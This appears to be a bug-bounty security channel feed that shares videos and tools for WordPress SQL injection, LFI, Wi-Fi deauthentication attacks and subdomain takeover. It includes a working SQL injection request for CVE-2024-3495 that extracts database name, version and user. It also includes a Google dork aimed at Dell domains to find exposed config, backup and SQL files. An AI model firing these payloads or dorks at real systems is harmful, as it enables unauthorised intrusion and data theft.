haxshadow

2.56K views10:56

Easy way to find 𝐰𝐨𝐫𝐝𝐩𝐫𝐞𝐬𝐬 𝘀𝗾𝗹 𝗶𝗻𝗷𝗲𝗰𝘁𝗶𝗼𝗻 manually+CVE | bug bounty poc 🔥

https://youtu.be/V-2rz5xvw0I?si=2CtA5N0yZs6rzI9K

YouTube

Easy way to find 𝐰𝐨𝐫𝐝𝐩𝐫𝐞𝐬𝐬 𝘀𝗾𝗹 𝗶𝗻𝗷𝗲𝗰𝘁𝗶𝗼𝗻 manually+CVE | bug bounty poc 🔥

In this video, we dive deep into finding WordPress SQL Injection vulnerabilities manually. Whether you're a bug bounty hunter or a cybersecurity enthusiast, you'll learn step-by-step techniques for identifying SQL injection points. We'll also cover specific…

❤4👏1

2.03K views04:55

haxshadow

Proof of concept CVE 2024-CVE-2024-3495

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <Host>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 172

action=tc_csca_get_states&nonce_ajax={{nonce}}&cnt=1+or+0+union+select+concat(0x64617461626173653a,database(),0x7c76657273696f6e3a,version(),0x7c757365723a,user()),2,3--+-

2.15K views04:56

haxshadow

❤3

1.87K views15:55

haxshadow

https://youtu.be/DA29Bj87eFE

YouTube

LFI aka Directory traversal mass hunting | Bug bounty poc

#bugbounty #lfi
LFI aka Directory traversal mass hunting | Bug bounty poc

in this video i am going to show you all how to hunt for local file inclusion lfi and directory traversal vulnerability in bug bounty program so you can secure there website and earn…

1.88K views03:20

haxshadow

https://youtube.com/post/UgkxYCsyXfN7IHhyUxwcJ8x0293FDnoIIpcO?si=_WQrBAZsGmB0iCFq

👍2👏1

1.86K views07:44

haxshadow

Wifire: Automated Wi-Fi Scanner and Attacker
Wifire is a Python-based tool that enables Wi-Fi network scanning, deauthentication attacks, and WPA/WPA2 handshake capture. It captures WPA/WPA2 handshakes and extracts hashes for further analysis
This tool is for educational purposes and should only be used on networks that you own or have permission to test Performance: Results may vary depending on the Wi-Fi adapter and its compatibility with monitor mode and packet injection.Further Use: Captured handshakes can be analyzed using hash-cracking tools like aircrack-ng or hashcat.
https://github.com/Sheikh-Nightshader/Wifire

GitHub

GitHub - Sheikh-Nightshader/Wifire: Wifire: Automated Wi-Fi Scanner and Attacker. Wifire is a Python-based tool that enables Wi…

Wifire: Automated Wi-Fi Scanner and Attacker. Wifire is a Python-based tool that enables Wi-Fi network scanning, deauthentication attacks, and WPA/WPA2 handshake capture. It captures WPA/WPA2 hands...

👍1

2.09K views08:06

haxshadow

microsoft.txt

9.4 KB

❤3

1.99K views13:15

haxshadow

👍5

2.16K views04:31

haxshadow

Subowner - A Simple python based tool to check for subdomain takeovers in mass scanning. Supports, AWS, Fastly, Shopify, Azure etc.

https://github.com/ifconfig-me/subowner

2.32K views04:31

haxshadow

try this google dork to find senstive files on website:

site:*.dell.com (ext:doc OR ext:docx OR ext:odt OR ext:pdf OR ext:rtf OR ext:ppt OR ext:pptx OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:md OR ext:log OR ext:bak OR ext:conf OR ext:sql)

🔥11👍3👎2

2.36K views15:12

haxshadow

https://github.com/haxshadow/pvt-templates

This my privite remplate

❤9👍2🔥2👎1

2.27K views13:00

haxshadow

T-mobile - Live bug bounty hunting on bugcrowd | live Recon

https://youtu.be/CJJoLbixidA?si=lN3tlApqIFCVgBIa

YouTube

T-mobile - Live bug bounty hunting on bugcrowd | live Recon

🌟 T-Mobile - Live Bug Bounty Hunting on Bugcrowd | Real-Time Reconnaissance Adventure! 🌟

🎯 Ready to step into the thrilling world of ethical hacking? Join us LIVE as we embark on an epic bug bounty hunt, targeting T-Mobile's assets through Bugcrowd! Watch…

🔥10❤4👎2